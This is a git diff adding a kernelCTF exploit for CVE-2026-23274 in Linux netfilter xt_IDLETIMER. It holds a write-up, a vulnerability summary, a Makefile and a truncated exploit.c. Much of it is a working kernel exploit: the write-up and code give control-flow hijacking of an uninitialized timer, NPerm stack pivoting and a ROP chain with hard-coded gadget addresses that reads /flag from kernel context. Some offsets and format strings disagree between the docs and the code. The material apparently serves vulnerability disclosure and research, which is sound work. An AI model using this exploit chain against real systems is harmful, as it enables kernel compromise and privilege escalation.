diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md new file mode 100644 index 000000000..e1324fdce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md @@ -0,0 +1,298 @@ +# **Vulnerability** + +## Summary +In `net/netfilter/xt_IDLETIMER.c`, when a label is first created by revision 1 with XT_IDLETIMER_ALARM enabled and is later reused from revision 0, the kernel can invoke mod_timer() on uninitialized memory. This results in a Use-Before-Initialization condition and can subsequently lead to control-flow hijacking if the uninitialized memory is attacker-controlled. + +Specifically, rev0 `idletimer_tg_checkentry()` reuses an existing object by label and unconditionally does `mod_timer(&info->timer->timer, ...)`. rev1 can create an object with `timer_type` = `XT_IDLETIMER_ALARM`. In that case `idletimer_tg_create_v1()` initializes the alarm backend and never calls `timer_setup()` for info->timer->timer. So if a rev1 ALARM rule is created first and a rev0 rule later reuses the same label, rev0 touches a struct timer_list that was never initialized. + +## **Vulnerability Analysis** +This bug was introduced in Linux kernel v5.7-rc1. When commit 68983a354a65 ("netfilter: xtables: Add snapshot of hardidletimer target") introduces rev1 `idletimer_tg_checkentry_v1()`, it also adds the type confusion check in `idletimer_tg_checkentry_v1()`. + +```c +if (info->timer->timer_type != info->timer_type) { + pr_debug("Adding/Replacing rule with same label and different timer type is not allowed\n"); + mutex_unlock(&list_mutex); + return -EINVAL; +} +``` + +However, it forgot to also check type confusion in rev0 `idletimer_tg_checkentry()`. So this bug can be triggered by first creating a rev1 ALARM rule and then creating a rev0 rule with the same label, but **not** the other way around. 
+ + +And in the newly added `idletimer_tg_create_v1()`, if `timer_type & XT_IDLETIMER_ALARM`, the function will only call `alarm_init()` and `alarm_start_relative()` but will **not** do `timer_setup()` for `info->timer->timer`: + +```c +if (info->timer->timer_type & XT_IDLETIMER_ALARM) { + ktime_t tout; + alarm_init(&info->timer->alarm, ALARM_BOOTTIME, + idletimer_tg_alarmproc); + info->timer->alarm.data = info->timer; + tout = ktime_set(info->timeout, 0); + alarm_start_relative(&info->timer->alarm, tout); +} else { + timer_setup(&info->timer->timer, idletimer_tg_expired, 0); // leaves timer uninitialized if timer_type is ALARM + mod_timer(&info->timer->timer, + msecs_to_jiffies(info->timeout * 1000) + jiffies); +} +``` + +Later in rev0's `idletimer_tg_checkentry()` which does not have the type check, as `__idletimer_tg_find_by_label()` uses the same global `idletimer_tg_list`, it can fetch the timer created from rev1 and then unconditionally call `mod_timer(&info->timer->timer, ...)`, thus triggering the Use-Before-Initialization bug. +```c +info->timer = __idletimer_tg_find_by_label(info->label); +if (info->timer) { + info->timer->refcnt++; + mod_timer(&info->timer->timer, + msecs_to_jiffies(info->timeout * 1000) + jiffies); // UBI to CFH + pr_debug("increased refcnt of timer %s to %u\n", + info->label, info->timer->refcnt); +} +``` + +The bug was patched in v7.0-rc4 by our team after kctf submission. + +# Exploit + +## Exploit Summary +- **Prefetch** → Kernel base address leak +- **CVE-2026-23274** → UBI in `mod_timer()`; leaving a payload in kmalloc-256 escalates this to CFH directly +- **NPerm** → Place fake stack for ROP chain +- **ROP** → After CFH, pivot to the stack and execute ROP *in softirq* to read the flag directly. 
+ +## Exploit Details + +### From UBI to CFH +Since the `mod_timer()` is called with `(idletimer_tg) info->timer->timer` uninitialized, and the uninitialized `idletimer_tg` is allocated by `kmalloc(sizeof(*info->timer), GFP_KERNEL)`, we can control the content of the uninitialized `timer_list timer` by controlling the content of a freed `kmalloc-256` chunk. + +In rev1, the `alarm` field in `struct idletimer_tg` is initialized but not the `timer` field. + +Then, the independent `timer_list timer` will be used by `mod_timer()`. It contains the callback function pointer `function`: +```c +struct idletimer_tg { + struct list_head entry; + struct alarm alarm; + struct timer_list timer; + struct work_struct work; + + struct kobject *kobj; + struct device_attribute attr; + + unsigned int refcnt; + u8 timer_type; +}; + +struct timer_list { + struct hlist_node entry; + unsigned long expires; + void (*function)(struct timer_list *); + u32 flags; +}; +``` + +In `__mod_timer()` + +```c +int mod_timer(struct timer_list *timer, unsigned long expires) +{ + return __mod_timer(timer, expires, 0); +} + +static inline int +__mod_timer(struct timer_list *timer, unsigned long expires, unsigned int options) +{ + unsigned int idx = UINT_MAX; + ... + debug_assert_init(timer); + if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) { + ... // We avoid this branch by controlling entry.pprev so timer_pending(timer) returns false. + } else { + base = lock_timer_base(timer, &flags); // Set timer->flags to 0 to avoid an infinite loop here. + if (!timer->function) + goto out_unlock; + forward_timer_base(base); + } + ... 
+ debug_timer_activate(timer); + timer->expires = expires; + if (idx != UINT_MAX && clk == base->clk) // Not taken + enqueue_timer(base, timer, idx, bucket_expiry); + else + internal_add_timer(base, timer); // Will give us CFH later by setting timer->function +out_unlock: + raw_spin_unlock_irqrestore(&base->lock, flags); + return ret; +} +``` + +To make `timer_pending()` return false, we simply need to set `entry.pprev` to 0: +```c +struct hlist_node { + struct hlist_node *next, **pprev; +}; +static inline int timer_pending(const struct timer_list * timer) +{ + return !hlist_unhashed_lockless(&timer->entry); +} +static inline int hlist_unhashed_lockless(const struct hlist_node *h) +{ + return !READ_ONCE(h->pprev); +} +``` + +And also set `timer->flags` to 0 to avoid an infinite loop in `lock_timer_base()`: +```c +static struct timer_base *lock_timer_base(struct timer_list *timer, + unsigned long *flags) + __acquires(timer->base->lock) +{ + for (;;) { + struct timer_base *base; + u32 tf; + tf = READ_ONCE(timer->flags); + + if (!(tf & TIMER_MIGRATING)) { // must enter this branch to avoid an infinite loop + base = get_timer_base(tf); + raw_spin_lock_irqsave(&base->lock, *flags); + if (timer->flags == tf) + return base; + raw_spin_unlock_irqrestore(&base->lock, *flags); + } + cpu_relax(); + } +} +``` +And then after 1 second, our evil `timer_list` will be executed in softirq context and we can get an `arb_function(EVIL_TIMER_LIST)`. + +### Stack Pivot after CFH +> We discuss why we did not use Ret2BPFJIT in the "Additional Notes" section. + +Since the UBI `timer_list` will be rewritten in `__mod_timer()`, we can only directly control the `function` pointer but not the arguments. + +At that point, `RDI` and `R13` point to the overwritten `timer_list`, which is a part of `idletimer_tg` in kmalloc-256. So if we can spray some bytes with `user_keypayload` in the adjacent chunk, we can control roughly `{RDI, R13}:[0x90-0x170]` (or the negative offset) as our payload. 
+ +> (We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); in libxdk, so we turned to our own gadgets) + +So we used the following gadgets, which exist in both `cos-113-18244.582.2` and `cos-113-18244.582.40`. + +The first-stage gadget will control `RDI` and `RIP` at the same time. To store the fake stack frame, we use `NPerm` from @kylebot and @n132 in CVE-2025-38477 to place the new stack at a certain address. + +As we will do an extremely long ROP, even though the `cpu_entry_area` is not randomized before Linux 6.2, we still need to use NPerm to fake a larger stack frame. + +Then the second gadget will control `RDX` and `RIP` at the same time, and also set `RBX` to a valid address so the final stack pivot gadget won't crash. +At this point, `RDX` == `RDI` == address of the `NPerm` fake stack frame. + +Finally the third gadget controls `RSP` from `RDX` and begins our ROP execution. +```c +// --- initial stack pivot gadgets --- +// In short, the stack pivot is: +// 1. control PC, the rdi/r13 + 0x90 is a controllable user_keypayload range. +// 2. control PC and rdx, the rbx = rdi is a controllable nperm range. +// 3. control PC and rsp = rdx, we can now start ROP. Writing to [rbx] will not crash. + +size_t timer_stage1_callback = 0xffffffff81313849; +// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax; +// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*? 
+// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time +// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there + + +size_t nperm_stage1_dispatch = 0xffffffff810643b9; +// nperm_stage1_dispatch: +// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a]; +// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax; +// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax; +// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget). +// This also sets rbx to a valid address so the stack pivoting gadget won't crash. + +size_t nperm_stack_pivot = 0xffffffff81db2b0f; +// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret; +// This is the final stack pivot +``` + +### ROP to read the flag +> We discuss why we did not use core_pattern in the "Additional Notes" section. + +There are several issues we would need to solve because we are now ROPing in softirq context. Rather than address each of them, we use one long ROP chain to do everything we need, which is feasible because `NPerm` allows us to place a maximum of **512*8** bytes of payload. + +Then we did the following things in our ROP to directly read the flag and print it to the kernel log: + +- Prepare a fake work_struct in a stable writable kernel region. This object will be loaded by `rpc_prepare_task+5` as a second controlled object and will transfer control into a second pivot sequence. With this we can leave the timer softirq path as early as possible and move the final logic into process context. + +- We use another controlled region (populated via arbitrary writes in the ROP chain to a writable kernel address) that holds both pivot metadata and the final ROP stack. The metadata provides the pop rsp target used by the indirect branch from the fake work item. 
The stack then writes /flag, a printk format string visible to a low-level attacker, a read position, and a read buffer into writable kernel memory. With those arguments in place, the chain performs filp_open, kernel_read, and finally _printk to emit the flag. **We did NOT use arb write to set `dmesg_restrict` to 0, but since we are doing ROP we can easily add that if needed.** + +- The exploit therefore queues the fake work item onto CPU0 and stops the current CPU. Then the queued kworker can run the open-read-printk sequence from process context. + +The queueing step is necessary because direct VFS activity from timer softirq context is fragile. + +Here is the **equivalent** of our ROP chain in C-like pseudocode: +```c +struct fake_work_item { + struct work_struct work; + struct fake_rpc_dispatch { + void *stage2_base; + void *dispatch_target_slot; + } dispatch; +}; + +struct flag_read_context { + char path[16]; + char fmt[16]; + loff_t pos; + char buf[0x80]; +}; + +static void stage2_behavior(struct flag_read_context *ctx) { + struct file *fp; + fp = filp_open(ctx->path, O_NOATIME, 0); + kernel_read(fp, ctx->buf, sizeof(ctx->buf), &ctx->pos); + _printk(ctx->fmt, ctx->buf); + for (;;) + cpu_relax(); +} + +static void semantic_rop_behavior(void *work_base, void *pivot_base) { + struct flag_read_context *ctx = pivot_base + 0x98; + // prepare stage2 context + strcpy(ctx->path, "/flag"); + strcpy(ctx->fmt, "\001%s\n"); // make it readable to a very low-level attacker + ctx->pos = 0; + memset(ctx->buf, 0, sizeof(ctx->buf)); + + // stage1 behavior, prepare fake work + struct fake_work_item *item = work_base; // any rw kernel address + item->work.data = WORK_STRUCT_PENDING_BITS; + item->work.entry.next = &item->work.entry; + item->work.entry.prev = &item->work.entry; + item->work.func = (work_func_t)rpc_prepare_task_plus_5; + item->dispatch.stage2_base = pivot_base; + item->dispatch.dispatch_target_slot = &((char *)pivot_base)[0x66]; + *(void 
**)item->dispatch.dispatch_target_slot = pop_rsp_pop_r13_ret; + + queue_work_on(0, system_wq, &item->work); + stop_this_cpu(); + // The real exploit forges enough metadata so that rpc_prepare_task+5 pivots into a stack whose + // effect is equivalent to calling stage2_behavior(ctx) from kworker process context. +} +``` + +The full ROP can be found in the `exploit.c` file. + +Overall, the ROP plan is: use the timer corruption to reach NPerm-backed stack control, use that control to build and queue fake work, and let the queued kworker execute the final file-read-and-print sequence in process context. + +## Additional Notes + +### Why not use Ret2BPFJIT +As we know, even after cBPF JIT was hardened by default (`bpf_jit_harden` is enabled) in kctf now, attackers can still spray a "kernel one gadget" with unpoisoned instructions and gain root, like [CVE-2025-21700 exploit](https://github.com/google/security-research/blob/bc107b0437c09e3b430948a60ab29f65338e4fff/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md). + +However, their 100% success rate solution seems to rely on certain registers pointing to a valid address (as a side effect of their nop sled). +But those register constraints are not satisfied in our case, and we did not try to remove or find another alternative nop sled to enhance their solution. So currently the "kernel one gadget" approach is not working for us. + +### Why use ROP to read the flag +As our corrupted `timer_list` was called in softirq context, we cannot use normal *COMMIT_CREDS_RETURN_USER* ROP to gain a root shell, nor use tricks like *[telefork](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/)*. 
+ +For the common LPE and container escape via `core_pattern`, we also failed to trigger the usermode helper because: +- During the stack pivot, we overwrite some callee-saved registers that are needed to return from softirq properly (mainly for unlocking and some other purposes). So we just naively halt the core by doing `msleep` in softirq context because we have 2 cores to waste. +- The core dump will queue the umh if `core_pattern[0]` == `|`, and then wait for the dumped process group to exit. So it will always queue the actual `call_usermodehelper(OUR_LPE_PAYLOAD)` request instead of executing it directly. +- In our case, the queued request always went to the halted core. As a result, we saw our payload being queued repeatedly but never executed. + +Thus, we switched to manually queueing a read-flag work item on another core before halting the first core. +And it turns out that this is a relatively long ROP (found by ropbot), and several of its gadgets cannot be generated by the current libxdk. 
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md new file mode 100644 index 000000000..831b75c92 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md @@ -0,0 +1,13 @@ +# Vulnerability Details + +- **Requirements**: + - **Capabilities**: `CAP_NET_ADMIN` + - **Kernel configuration**: `CONFIG_NETFILTER=y, CONFIG_NETFILTER_XTABLES=y, CONFIG_NETFILTER_XT_TARGET_IDLETIMER=y, CONFIG_IP_NF_IPTABLES=y` + - **User namespaces required**: Yes +- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=68983a354a655c35d3fb204489d383a2a051fda7 +- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf +- **Affected Version**: `v5.7-rc1 - v7.0-rc3` +- **Affected Component**: `net/netfilter: xt_IDLETIMER` +- **Syscall to disable**: `unshare` +- **Cause**: Use-Before-Initialization +- **Description**: A Use-Before-Initialization vulnerability was discovered in the Linux kernel's netfilter subsystem. When a label is first created by revision 1 with XT_IDLETIMER_ALARM and is then reused from revision 0, mod_timer() is called on an uninitialized timer_list, leading to a Use-Before-Initialization condition. 
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/Makefile b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/Makefile new file mode 100644 index 000000000..5d9de1904 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/Makefile @@ -0,0 +1,36 @@ +CC := g++ +CPPFLAGS := -Ikernel-research/libxdk/include +CFLAGS := -static +LDFLAGS := -Lkernel-research/libxdk/lib +LDLIBS := -lkernelXDK + +TARGETS := exploit exploit_debug +SRC := exploit.c + +.PHONY: all prerequisites run clean + +all: prerequisites exploit + +prerequisites: target_db.kxdb kernel-research/libxdk/lib/libkernelXDK.a + +target_db.kxdb: + wget -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +kernel-research: + git clone --depth 1 https://github.com/google/kernel-research.git $@ + +kernel-research/libxdk/lib/libkernelXDK.a: | kernel-research + cd kernel-research/libxdk && ./build.sh + +exploit: $(SRC) + $(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS) + +exploit_debug: CFLAGS += -g +exploit_debug: $(SRC) + $(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS) + +run: exploit + ./$< + +clean: + rm -rf $(TARGETS) target_db.kxdb kernel-research \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit new file mode 100644 index 000000000..ae20156ce Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c new file mode 100644 index 000000000..99f59bb9f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c @@ -0,0 +1,791 @@ +// #define _GNU_SOURCE + +#include +#include 
+#include +#include +#include +#include +#include +#include +#include +#include +#include + +// Exploit for cos-113-18244.582.2 by project whatforlunch + +// --- initial stack pivot gadgets --- +// In short, the stack pivot is: +// 1. control PC, the rdi/r13 + 0x90 is a controllable user_keypayload range. +// 2. control PC and rdx, the rbx = rdi is a controllable nperm range. +// 3. control PC and rsp = rdx, we can now start ROP. Writing to [rbx] will not crash. + +size_t timer_stage1_callback = 0xffffffff81313849; +// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax; +// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*? +// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time +// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there + + +size_t nperm_stage1_dispatch = 0xffffffff810643b9; +// nperm_stage1_dispatch: +// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a]; +// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax; +// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax; +// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget). +// This also sets rbx to a valid address so the stack pivoting gadget won't crash. 
+ +size_t nperm_stack_pivot = 0xffffffff81db2b0f; +// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret; +// This is the final stack pivot + +// We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); + +// --- The above gadgets are not supported by libxdk so we don't need to modify those --- + +size_t rpc_prepare_task_dispatch = 0xffffffff822248b5; // (rpc_prepare_task+5) mov rax,[rdi+0x98]; mov rsi,[rdi+0x90]; mov rax,[rax]; jmp __x86_indirect_thunk_array +size_t push_rsi_jmp_qword_ptr_rsi_plus_0x66 = 0xffffffff81c6d191; // push rsi ; jmp qword ptr [rsi+0x66] +size_t pop_rsp_pop_r13_ret = 0xffffffff81002148; // pop rsp ; pop r13 ; ret +size_t add_rsp_0x88_ret = 0xffffffff81240dbd; // add rsp, 0x88 ; ret +size_t boot_command_line = 0xffffffff84560920; // boot_command_line +size_t __init_begin = 0xffffffff8445d000; // __init_begin + +size_t nperm_addr = 0xffffffff8445d000 + 0x200000; // __init_begin + 0x200000, written as a literal to avoid a compiler complaint + +#include +#include + +class SubmissionTarget : public Target { +public: + using Target::Target; + + std::vector GetRopActionItemsByName(const std::string& name) const { + auto it = rop_actions.find(name); + if (it == rop_actions.end()) + throw ExpKitError("missing custom RopAction %s", name.c_str()); + return it->second; + } +}; + +static SubmissionTarget *g_target = nullptr; +uint64_t kaslr; + +static void add_target_rop_action(RopChain& rop_chain, const char* name, + std::vector arguments = {}) { + std::vector rop_items = g_target->GetRopActionItemsByName(name); + for (const auto& item : rop_items) { + if (item.type == RopItemType::CONSTANT_VALUE) { + rop_chain.Add(item.value); + } else if (item.type == RopItemType::ARGUMENT) { + if (item.value >= arguments.size()) + throw ExpKitError( + "not enough arguments for custom RopAction %s, got %zu arguments, but needed %lu", + name, arguments.size(), item.value + 1); + rop_chain.Add(arguments[item.value]); + } else 
if (item.type == RopItemType::SYMBOL) { + rop_chain.Add(item.value, true); + } else { + throw ExpKitError("unexpected RopAction item type %u for %s", + item.type, name); + } + } +} + +// initialize libxdk target DB +INCBIN(target_db, "target_db.kxdb"); +// manually register symbols not in kxdb via AddSymbol +void init_libxdk(void) { + static TargetDb kxdb("target_db.kxdb", target_db); + static SubmissionTarget target("", ""); + static bool initialized = false; + + if (!initialized) { + SubmissionTarget st("kernelctf", "cos-113-18244.582.2"); + + st.AddSymbol("timer_stage1_callback", 0x313849); + st.AddSymbol("nperm_stage1_dispatch", 0x643b9); + st.AddSymbol("nperm_stack_pivot", 0xdb2b0f); + st.AddSymbol("rpc_prepare_task_dispatch", 0x12248b5); + st.AddSymbol("push_rsi_jmp_qword_ptr_rsi_plus_0x66", 0xc6d191); + st.AddSymbol("pop_rsp_pop_r13_ret", 0x2148); + st.AddSymbol("add_rsp_0x88_ret", 0x240dbd); + st.AddSymbol("boot_command_line", 0x3560920); + + st.AddStruct("work_struct", 0x20, { + {"data", 0x00, 8}, + {"entry.next", 0x08, 8}, + {"entry.prev", 0x10, 8}, + {"func", 0x18, 8}, + }); + + st.AddStruct("idletimer_tg", 0x100, { + {"timer.entry.pprev", 0x90, 8}, + {"timer.expires", 0x98, 8}, + {"timer.function", 0xa0, 8}, + {"timer.flags", 0xa8, 4}, + }); + + st.AddRopAction("write_what_where_64_cfh", { + {RopItemType::SYMBOL, 0x2a0d4c}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x1ff6c5}, + }); + + st.AddRopAction("filp_open_path", { + {RopItemType::SYMBOL, 0xb083be}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x9376ab}, + {RopItemType::ARGUMENT, 2}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::SYMBOL, 0x43a420}, + }); + + st.AddRopAction("kernel_read_buf_from_rax", { + {RopItemType::SYMBOL, 0x26317d}, + {RopItemType::SYMBOL, 0xe0e4a}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::ARGUMENT, 2}, + {RopItemType::SYMBOL, 0x43cf10}, + }); + + st.AddRopAction("printk_fmt_buf", { + 
{RopItemType::SYMBOL, 0xafda91}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x20f4b0}, + }); + + // st.AddRopAction("park_loop", { + // {RopItemType::SYMBOL, 0x2a0d4c}, + // {RopItemType::SYMBOL, 0x649}, + // {RopItemType::CONSTANT_VALUE, 0x0}, + // {RopItemType::SYMBOL, 0x649}, + // }); + + // Panic the kernel in CI to avoid timeout. + st.AddRopAction("park_loop", { + {RopItemType::SYMBOL, 0xdeadbeefcafebabe}, + {RopItemType::SYMBOL, 0xdeadbeefcafebabe}, + {RopItemType::CONSTANT_VALUE, 0xdeadbeefcafebabe}, + {RopItemType::SYMBOL, 0xdeadbeefcafebabe}, + }); + + st.AddRopAction("queue_work_cpu0_then_stop", { + {RopItemType::SYMBOL, 0xafda91}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x1c87f8}, + {RopItemType::SYMBOL, 0x9376ab}, + {RopItemType::CONSTANT_VALUE, 0x0}, + {RopItemType::CONSTANT_VALUE, 0x0}, + {RopItemType::SYMBOL, 0xfe7c0}, + }); + + kxdb.AddTarget(st); + target.Merge(kxdb.AutoDetectTarget()); + initialized = true; + } + + g_target = ⌖ + printf("[+] Target: %s %s\n", target.GetDistro().c_str(), target.GetReleaseName().c_str()); +} + + +// KASLR-adjusted kernel symbol/gadget address calculation +void setup_kernel_address() { + timer_stage1_callback = kaslr + g_target->GetSymbolOffset("timer_stage1_callback"); + nperm_stage1_dispatch = kaslr + g_target->GetSymbolOffset("nperm_stage1_dispatch"); + nperm_stack_pivot = kaslr + g_target->GetSymbolOffset("nperm_stack_pivot"); + + rpc_prepare_task_dispatch = + kaslr + g_target->GetSymbolOffset("rpc_prepare_task_dispatch"); + push_rsi_jmp_qword_ptr_rsi_plus_0x66 = + kaslr + g_target->GetSymbolOffset("push_rsi_jmp_qword_ptr_rsi_plus_0x66"); + pop_rsp_pop_r13_ret = kaslr + g_target->GetSymbolOffset("pop_rsp_pop_r13_ret"); + add_rsp_0x88_ret = kaslr + g_target->GetSymbolOffset("add_rsp_0x88_ret"); + boot_command_line = kaslr + g_target->GetSymbolOffset("boot_command_line"); + // __init_begin = kaslr + 
g_target->GetSymbolOffset("__init_begin"); + // nperm_addr = __init_begin + 0x200000; + // nperm_addr = kaslr + 0x3697000; // borrowed from the initial NPERM exploit, kind of image-irrelevant + nperm_addr = kaslr + 0x355d000; // labelled "__init_begin + 0x200000"; NOTE(review): 0x355d000 is 0x345d000 + 0x100000 - confirm which offset is intended + printf("[!] Nperm addr: 0x%lx\n", nperm_addr); +} + +/* ============================= Nperm =============================*/ +#include +void pgvAdd(int idx, int order, int nr); +void *pgvMap(int idx); +void pgvDel(int idx); +void unshare_setup(); +// note: 0xffffffff84697000 is kept for reference; the address does not need to be the same. +void nperm(){ + unshare_setup(); + size_t ctx[0x200] = {}; + size_t fake_work_data_off = g_target->GetFieldOffset("work_struct", "data"); + size_t fake_work_entry_next_off = g_target->GetFieldOffset("work_struct", "entry.next"); + size_t fake_work_entry_prev_off = g_target->GetFieldOffset("work_struct", "entry.prev"); + size_t fake_work_func_off = g_target->GetFieldOffset("work_struct", "func"); + size_t fake_work_size = g_target->GetStructSize("work_struct"); + // finish stack pivot + for (int i = 0; i < 0x200; i++) { + ctx[i] = 0; // ctx[i] = 0x2809099f00000000 + (i << 16); + } + ctx[1] = nperm_addr - 0xa8 + 16; // +0xa8=nperm[2] + ctx[2] = nperm_stack_pivot; // rax = New PC + ctx[24] = nperm_addr + 8 * 25; // PC = NPerm[26] + // nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret; + // rsp = rdx = NPerm[24]; r13 = NPerm[25] + + + // Real ROP + size_t work_base = boot_command_line; + size_t pivot_base = work_base + 0x100; + size_t path_ptr = pivot_base + 0x400; + size_t fmt_ptr = path_ptr + 0x10; + size_t pos_ptr = fmt_ptr + 0x10; + size_t buf_ptr = pos_ptr + 0x20; + + // The odd constants are "target - 0xc0" because the write gadget is: + // mov qword ptr [rax + 0xc0], rdx ; ret + size_t fake_work_list = work_base + 0x08; + size_t pivot_indirect_window = pivot_base - 0x60; + /* + * WORK_BASE : fake work_struct + rpc_prepare_task slots + * PIVOT_BASE : 
process-context pivot metadata + final ROP stack + * PATH_PTR : "/flag" + * FMT_PTR : "\x010%s\n" + * POS_PTR : loff_t position for kernel_read() + * BUF_PTR : kernel_read() output buffer + * + * WORK_BASE+fake_work_data_off : fake work_struct.data + * WORK_BASE+fake_work_entry_next_off : fake work.entry.next + * WORK_BASE+fake_work_entry_prev_off : fake work.entry.prev + * WORK_BASE+fake_work_func_off : fake work.func / stage1 dispatcher + * WORK_BASE+fake_work_size : first slot after work_struct + * WORK_BASE+0x90 : stage2 RSI base + * WORK_BASE+0x98 : pointer to dispatch target slot + * WORK_BASE+0xa0 : dispatch target contents + * PIVOT_BASE+0x00 : pop-rsp chain head + * PIVOT_BASE+0x66 : indirect jump slot for pop rsp + */ + + // the values below are data-only, so there is no need to adapt them to libxdk + size_t fake_work_data = 0x0000000fffffffe0; + size_t file_open_flags = 0x0000000000040000; + size_t read_count = 0x0000000000000080; + size_t flag_string = 0x00000067616c662f; // little-endian "/flag"; backup: 0x616d642f636f7270; + size_t fmt_lo = 0x0a73253001; // little-endian bytes 01 30 25 73 0a, i.e. \x01 followed by "0%s\n" + size_t fmt_hi = 0; + + auto append_qword_write = [&](RopChain& rop_chain, size_t target_addr, + uint64_t value) { + add_target_rop_action(rop_chain, "write_what_where_64_cfh", + {target_addr - 0xc0, value}); + }; + + auto append_payload_write = [&](RopChain& rop_chain, size_t target_base, + Payload& payload) { + std::vector payload_data = payload.GetUsedData(); + for (size_t offset = 0; offset < payload_data.size(); + offset += sizeof(uint64_t)) { + uint64_t value = 0; + memcpy(&value, payload_data.data() + offset, sizeof(uint64_t)); + append_qword_write(rop_chain, target_base + offset, value); + } + }; + + int rop = 26; + // Build fake work_struct and rpc_prepare_task slots under WORK_BASE with + // libxdk Payload/RopChain instead of a hand-written ctx[rop++] sequence. 
+ const size_t work_dispatch_rsi_off = 0x90; + const size_t work_dispatch_target_ptr_off = 0x98; + const size_t work_dispatch_target_off = 0xa0; + Payload work_payload(work_dispatch_target_off + sizeof(uint64_t)); + work_payload.SetU64(fake_work_data_off, fake_work_data); + work_payload.SetU64(fake_work_entry_next_off, fake_work_list); + work_payload.SetU64(fake_work_entry_prev_off, fake_work_list); + work_payload.SetU64(fake_work_func_off, rpc_prepare_task_dispatch); + work_payload.SetU64(fake_work_size, 0x0); + work_payload.SetU64(work_dispatch_rsi_off, pivot_base); + work_payload.SetU64(work_dispatch_target_ptr_off, pivot_indirect_window); + work_payload.SetU64(work_dispatch_target_off, + push_rsi_jmp_qword_ptr_rsi_plus_0x66); + + RopChain work_setup_rop(*g_target, kaslr); + append_payload_write(work_setup_rop, work_base, work_payload); + for (uint64_t word : work_setup_rop.GetDataWords()) + ctx[rop++] = word; + + // Lay out the process-context pivot metadata and the final ROP stack under + // PIVOT_BASE with a single libxdk Payload. 
